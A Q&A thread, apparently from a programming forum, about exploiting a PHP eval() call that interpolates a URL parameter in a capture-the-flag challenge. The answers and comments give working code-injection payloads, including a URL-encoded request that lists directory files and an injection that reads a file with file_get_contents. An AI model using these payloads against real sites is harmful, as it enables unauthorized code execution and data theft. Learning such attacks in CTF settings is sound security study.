# PHP input directly to functions

Tags: php, penetration-test

I am able to directly input with next to no constraints a value into a nest of functions, but I am unsure how I could exploit this. I got this by injecting PHP code into the URL to display the source code, I have to hack this function to capture the flag hidden in a file in the root directory (the same directory as the index.php)

```
eval("fwrite(fopen('stats/stats.txt','a'),'$fileName');"); ?>
```

This is the link I have to try and manipulate. Any ideas on what I could do? I don't know the name of the file that holds the flag.

Answer (score 2, accepted):

Inject this to eval() and it will displaying the directory files list:

`';var_dump(scandir(getcwd()));?>`

in url :

`/download.php?file=files/read_me.txt%27);var_dump(scandir(getcwd()));?>`

Comment: yea i managed to get this in the end xD managed to get in and get the files etc

Answer (score 2):

If you control the $fileName parameter then you can alter the following line from

```
eval("fwrite(fopen('stats/stats.txt','a'),'$fileName');"); ?>
```

to

```
eval("fwrite(fopen('stats/stats.txt','a'),'some_file.txt'); echo file_get_contents('challenge_file.txt'); echo('');"); ?>
```

`$fileName` is set to `some_file.txt'); echo file_get_contents('challenge_file.txt'); echo('`

So what happens? The string `some_file.txt');` ensures that `fwrite` is being called correctly (assume that the file exists and has appropriate permissions) and terminates the command with `;`.

Then we get the contents of the the challenge file and display them with

`echo file_get_contents('challenge_file.txt');`

`echo('` is expanded to `echo('');` so that the resulting php code is syntactically valid.

Comment: I am getting places slowly... I worked out to break the code I have to put in url speech marks which is weird because there isnt any to open the code... so i have to break it in the url also like so.... /download.php?file=files/read_me.txt%27);var_dump(%27%27.$file.%27 (this is me practicing executing code which obviously vardumps the url ) which is working btw

Comment: i am struggling displaying the directory files with scandir... i keep breaking it with encapsulated white space... which is annoying because I if i remove the speech marks it tries to find the file name

Comment: Run the code here. It's far more easier and convenient: http://phpfiddle.org/